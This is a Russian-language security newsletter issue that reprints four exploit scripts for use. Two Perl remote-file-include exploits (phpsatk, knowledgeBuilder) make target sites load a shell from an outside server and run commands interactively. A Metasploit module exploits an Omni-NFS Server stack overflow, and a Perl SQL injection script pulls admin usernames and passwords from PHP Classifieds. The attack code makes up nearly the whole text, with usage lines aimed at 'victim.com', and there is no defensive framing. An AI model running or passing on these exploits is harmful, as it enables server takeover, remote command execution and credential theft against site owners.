Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Exploits.


| Omni-NFS Server | PHP Classifieds
Компьютер для продвинутых пользователей
В этом выпуске:
phpsatk | knowledgeBuilder
ПО: phpsatk1

dos.py:
#!/usr/bin/perl
# phpsatk =>  Remote File Include Vulnerability
# Script.............. :phpsatk
# Discovered By.... : Root3r_H3ll    
# Location .......... : Iran
# Class..............  : Remote
# Original Advisory : http://Www.PersainFox.com
# We ArE : Root3r_H3LL & Arash.Rj
# ;

while ($cmd !~ "exit")
{
    $xpl = LWP::UserAgent->new() or die;
        $req =
HTTP::Request->new(GET=>$target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd)
or die("\n\n Failed to connect.");
        $res = $xpl->request($req);
        $r = $res->content;
        $r =~ tr/[\n]/[ê]/;

    if (@ARGV[4] eq "-r")
    {
        print $r;
    }
    elsif (@ARGV[5] eq "-p")
    {
    # if not working change cmd variable to null and apply patch manually.
    $cmd = "echo if(basename(__FILE__) == 
basename(\$_SERVER['PHP_SELF'])) die(); >> loader.php";
    print q
    {
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!                                Patch 
Applied                              !!
!! Code added to 
loader.php:                                                 !!
!! if(basename(__FILE__) == 
basename($_SERVER['PHP_SELF']))                  !!
!!    
die();                                                                 !!
!!                                                                           
!!
!! NOTE: Adding patch function has not been tested. If does not complie 
or   !!
!! there is an error, simply make cmd = null and add the patch code 
to       !!
!! 
loader.php                                                                !!
!!                                                                           
!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    }
    }
    else
    {
    print "[cmd]\$";
    $cmd = <STDIN>;
    }
}

sub header()
{
    print q
    {
.................................................................
...                                                            ..
...           phpsatk<=  Remote File Include  Exploit          ..
...                                                            ..
.................................................................
...                                                            ..
...              PerSiaNFox NetWork Security TeaM              ..
...              Discovered By : Root3r_H3ll                   ..
...                                                            ..
.................................................................
..                                                            ..
...                    Www.PerSiaNFox.coM                      ..
..                                                            ..
.................................................................

                   </\/\\/_ 10\/3 15 1|)\4/\/     
    };
}

sub usage()
{
header();
    print q
    {
                ..............................
                            Usage                                     
                                                                          
perl Root3r.pl <Target website> <Shell Location> <CMD Variable> 
<-r> <-p>
<Target Website> - Path to target eg: www.SiteName.com                 
<Shell Location> - Path to shell eg: www.Sh3llserver.com/sh3ll.txt
<CMD Variable> - Shell command variable name eg: cmd                 
<r> - Show output from shell                                        
<p> - Patch loader.php                                                
                           Example                               

perl Root3r.pl http://SiteName http://Sh3llserver/sh3ll.txt cmd -r -p   
                                                                           

    };
exit();
}

ПО: knowledgeBuilder
Версия: 2.2

rf.perl:
#!/usr/bin/perl
#
# knowledgeBuilder v.2.2.php.NuLL-WDYL=>  Remote File Include Vulnerability
# Script.............. :knowledgebuilder php.NuLL WDYL
# Discovered By.... : IGI
# Expl0iter ........ : Root3r_H3LL    
# Location .......... : Iran
# Class..............  : Remote
# Original Advisory :http://www.Virangar.org & http://Www.PersainFox.com
# ;

while ($cmd !~ "exit")
{
    $xpl = LWP::UserAgent->new() or die;
        $req =
HTTP::Request->new(GET=>$target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd)
or die("\n\n Failed to connect.");
        $res = $xpl->request($req);
        $r = $res->content;
        $r =~ tr/[\n]/[&#234;]/;

    if (@ARGV[4] eq "-r")
    {
        print $r;
    }
    elsif (@ARGV[5] eq "-p")
    {
    # if not working change cmd variable to null and apply patch manually.
    $cmd = "echo if(basename(__FILE__) == 
basename(\$_SERVER['PHP_SELF'])) die(); >> visEdit_control.class.php";
    print q
    {
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!                                Patch 
Applied                              !!
!! Code added to 
visEdit_control.class.php:                                  !!
!! if(basename(__FILE__) == 
basename($_SERVER['PHP_SELF']))                  !!
!!    
die();                                                                 !!
!!                                                                           
!!
!! NOTE: Adding patch function has not been tested. If does not complie 
or   !!
!! there is an error, simply make cmd = null and add the patch code 
to       !!
!! 
visEdit_control.class.php                                                 !!
!!                                                                           
!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    }
    }
    else
    {
    print "[cmd]\$";
    $cmd = <STDIN>;
    }
}

sub header()
{
    print q
    {
.................................................................
...                                                            ..
...     knowledgebuilder <=  Remote File Include  Exploit      ..
..                                                            ..
................................................................
...                Virangar Under Ground TeaM                   ..
...                           AND                              ..
...              PerSiaNFox NetWork Security TeaM              ..
...                  Discovered By : IGI                       ..
...                 ExPl0iter : Root3r_H3LL                    ..
.................................................................
...                     Www.Virangar.OrG                       ..
...                    Www.PerSiaNFox.coM                      ..
...                     Www.Virangar.NeT                       ..
.................................................................

                   </\/\\/_ 10\/3 15 1|)\4/\/     
    };
}

sub usage()
{
header();
    print q
    {
                ..............................
                            Usage                                     
                                                                          
perl Expl0it.pl <Target website> <Shell Location> <CMD 
Variable> <-r> <-p>
<Target Website> - Path to target eg: www.SiteName.com                 
<Shell Location> - Path to shell eg: www.Sh3llserver.com/sh3ll.txt
<CMD Variable> - Shell command variable name eg: cmd                 
<r> - Show output from shell                                        
<p> - Patch 
visEdit_control.class.php                                                
                           Example                               

perl Expl0it.pl http://SiteName http://Sh3llserver/sh3ll.txt cmd -r -p   
                                                                           

    };
exit();
}

ПО: Omni-NFS Server
Версия: 4.2

vd_xlink.pm:
# vd_xlink.pm
#
# The exploit is a part of VulnDisco Pack - use only under the license 
agreement
# specified in LICENSE.txt in your VulnDisco distribution

# VULNDISCO LICENSE

# Purchaser buys VulnDisco Pack ("the Pack") and receives the right to 
use it under the terms of the following License.

# The Pack with all the data and software contained in it is the private 
property of GLEG ltd. Company ("the Company"). The Company is the only 
entity who has exclusive rights to the Pack. The Pack with all the 
software and data containing in it is the intellectual property of the 
Company and is guarded by intellectual property laws.

# Purchaser has the rights to use the Pack only under the terms and 
conditions of this License to the maximum extent permitted by applicable 
law.
# Purchaser has the rights to use the Pack only for his own needs or for 
the needs of his company if the License is purchased by the company. For 
the means of this License by purchaser's company those people are meant 
who directly works for the company which owns the License.
# Purchaser is granted nonexclusive, non-transferable rights to use the 
Pack.

# Purchaser is allowed to install the Pack on unlimited number of seats.

# Purchaser is not restricted to use the Pack to test the particular IP 
range.

# Purchaser is not allowed to disclose the Pack in whole or partly, to 
disclose any information concerning the Pack or any information derived 
from the Pack. Purchaser is not allowed to transfer the Pack or any data 
concerning it (including derived data), anyhow or by any means to third 
party entities. Purchaser is not allowed to sell or redistribute or 
otherwise transfer the rights to the Pack unless otherwise is expressly 
stated in writing by the Company.

# Purchaser realizes that the Pack is provided as-is without warranty of 
any kind, including warranties that the Pack suits particular needs, is 
safe to use, or contain no issues.

# Purchaser realizes that the Pack contains potentially dangerous 
information which being improper used or misused can cause damage to 
Purchaser or to Purchaser's company or to third party organizations and 
individuals.

# The Company is not responsible for any losses to purchaser or to 
purchaser's company resulted from Purchaser's proper or improper use or 
inability to use the Pack, including but not limited to loss of 
information, damages to computers or to network infrastructure. The 
Company is not responsible for any losses to any third party 
organizations or individuals resulted from Purchaser's intentional or 
accidental use or misuse of the Pack. The Company is not responsible for 
any consequences of Purchaser's disclosure of the Pack.

# Purchaser realizes that he is solely responsible for any claims 
resulted from Purchaser's acquisition, use or misuse of the Pack and 
agrees to defend Company from mentioned claims at own cost.

# Purchaser agrees to take all necessary measures to not allow 
disclosure of the Pack, to use it only under the terms of this License 
and applicable law. Purchaser has been informed and agrees that in case 
of Purchaser.s breach of any provisions of this License the Company has 
right to take appropriate measures including legal prosecution.

# All information that is provided for Purchaser by the Company, 
including Pack updates and support information, is provided under the 
same terms as in the Pack License. As for newer versions of the Pack, 
the Company reserves the right to issue new License with them.

# This License is designed in accordance with the laws of Russian 
Federation.
# License terms are governed by the laws of Russian Federation. Unless 
otherwise is agreed in writing, all disputes relating to this License 
shall be subject to final and binding arbitration in Russia, Moscow.

# Purchaser has been informed and agrees that after installation of the 
Pack this Agreement is considered as signed and came into force as 
Agreement between the Company and Purchaser.

# Purchaser has read and understood this License, and agrees to its 
terms and conditions.

use strict;

package Msf::Exploit::vd_xlink;
use base "Msf::Exploit";
use Pex::Text;

my $advanced = { };

my $info =
{
    "Name"      => "[0day] Omni-NFS Server overflow",
        "Version"   => "\$Revision: 1.0 \$",
        "Authors"   => ["Evgeny Legerov"],
        "Arch"      => ["x86"],
        "OS"        => ["win32"],
        "Priv"      => 1,
        "UserOpts"  =>
                {
                    "RHOST" => [1, "ADDR", "The target address"],
                        "RPORT" => [1, "PORT", "The target port", 2049],
                },

        "Description" => Pex::Text::Freeform(q{
            Exploit for Omni-NFS Server stack overflow vulnerability.
        }),


       "Payload" =>
            {
                "Space"     => 427,
              },

        "DefaultTarget"  => 0,
        "Targets"        =>
             [
                ["Omni-NFS Server 5.2 (nfsd.exe: call ebx) / Windows 
2000 SP4", 0x00401843]

             ],

        "Keys"           => ["vd_xlink"],
};

sub new    {
    my $class = shift;
    return $class->SUPER::new({"Info" => $info, "Advanced" => 
$advanced}, @_);
}

sub Exploit {
    my $self = shift;
        my $host = $self->GetVar("RHOST");
        my $port = $self->GetVar("RPORT");
    my $writedir = $self->GetVar("DIR");
    my $bind_port = $self->GetVar("LPORT");
    my $target = $self->Targets->[$self->GetVar("TARGET")];
    my $encodedPayload = $self->GetVar("EncodedPayload");
        my $shellcode   = $encodedPayload->Payload;

         my $payload = "";
        $payload .= "\x4d" x 9;
        $payload .= $shellcode;
        $payload .= "\x4d" x (427 - length($shellcode));
        $payload .= "\x4d\x4d\x4d\x2d";
        $payload .= pack("V", $target->[1]);
        $payload .= "\xe9\x17\xfb\xff\xff"; # jmp $-1257
        $payload .= "\x45" x 351;

        my $s = "";
        $s .= pack("N", 1);
        $s .= pack("N", 0);
        $s .= pack("N", 2);
        $s .= pack("N", 100005);
        $s .= pack("N", 1);
        $s .= pack("N", 1);

        $s .= pack("N", 1);
        $s .= pack("N", 400);
        $s .= substr($payload, 0, 400);

        $s .= pack("N", 1);
        $s .= pack("N", 400);
        $s .= substr($payload, 400);

                
    my $req = pack("N", length($s) | 0x80000000) . $s;

      my $sock = Msf::Socket::Tcp->new("PeerAddr" => $host, "PeerPort"  
=> $port);
        if ($sock->IsError) {
                $self->PrintLine("Error creating socket: " . 
$sock->GetError);
                return;
        }

    $sock->Send($req);
    
    sleep(3);

    $sock->Close();
}

ПО: PHP Classifieds
Версия: 7.1

Php_Classifieds_expl.pl:
#!/usr/bin/perl
#[Script Name: Php Classifieds <= 7.1 (detail.php) Remote SQL Injection 
Exploit
#[Coded by   : ajann
#[Author     : ajann
#[Contact    : :(
use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[//  Php Classifieds <= 7.1 (detail.php) Remote SQL Injection Exploit
[//           Usage: class.pl [target] [path] [userid]
[//                   Example: class.pl victim.com / 1
[//                   Example: class.pl victim.com /path/ 1
[//                           Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$classifiedsserver = $ARGV[0];
$classifiedsserver =~ s/(http:\/\/)//eg;
$classifiedshost = "http://".$classifiedsserver;
$classifiedsport = "80";
$classifiedsdir = $ARGV[1];
$classifiedsfile = "detail.php?id=1009&contact=1&user_id=";
$classifiedsend = "member_login.php";
$classifiedstarget = 
"1%20union%20select%20concat(adm_name,char(32),adm_pass)%20from%20phpclass_admins%20where%20adm_id%20like%20".$ARGV[2];
$classifiedstarget = 
$classifiedshost.$classifiedsdir.$classifiedsfile.$classifiedstarget;
#Writing data to socket
print 
"+**********************************************************************+\n";
print "+ Trying to connect: $classifiedsserver\n";
$classifieds = IO::Socket::INET->new(Proto => "tcp", PeerAddr => 
"$classifiedsserver", PeerPort => "$classifiedsport") || die "\n+ 
Connection failed...\n";
print $classifieds "GET $classifiedstarget\n";
print $classifieds "Host: $classifiedsserver\n";
print $classifieds "Accept: */*\n";
print $classifieds "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$classifieds>) {
if ($answer =~ /(.*?)<\/b>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username and Password: $1\n";
print "+ Lets go $classifiedshost$classifiedsdir$classifiedsend and\n+ 
Login with this information. \n";
exit();
}

if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n";
print 
"+**********************************************************************+\n";
exit();
}

if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : (  \n";
print 
"+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print 
"+**********************************************************************+\n";
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru

В избранное